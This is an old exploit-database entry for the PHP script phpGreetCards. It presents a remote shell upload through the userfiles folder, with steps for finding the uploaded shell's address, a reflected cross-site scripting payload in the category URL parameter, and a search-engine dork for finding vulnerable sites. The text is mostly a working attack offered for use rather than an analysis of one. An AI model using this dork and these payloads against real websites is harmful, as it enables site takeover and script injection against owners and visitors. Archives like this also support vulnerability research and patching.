phpGreetCards - Cross-Site Scripting / Arbitrary File Upload

Author: ahmadbady
type: webapps
platform: php
port: 
date_added: 2008-12-22 
date_updated: 2017-01-23 
verified: 1 
codes: OSVDB-50989;CVE-2008-6849;OSVDB-50988;CVE-2008-6848 
tags: 
aliases:  
screenshot_url:  
application_url: http://www.exploit-db.comphpGreetCards.zip

...................................................................................................

****(remote shell upload/xss)****

script: phpGreetCards

***************************************************************************
download from:http://www.w2b.ru/download/phpGreetCards.zip

***************************************************************************
www.site.com/path/index.php?mode=select&category

shell: www.site.com/path/userfiles/number_shell.php
-----------------------------------------------------------------------------------------
dork:"powered by phpGreetCards"

if folder userfiles is forbidden
after get upload file u do right-click and see image properties and u see address file.

------------------------------------------------------------------------------------------
xss:
index.php?mode=select&category=>"><ScRiPt%20%0a%0d>alert(0)%3B</ScRiPt>
**************************************************


Author: ahmadbady

**************************************************

# milw0rm.com [2008-12-23]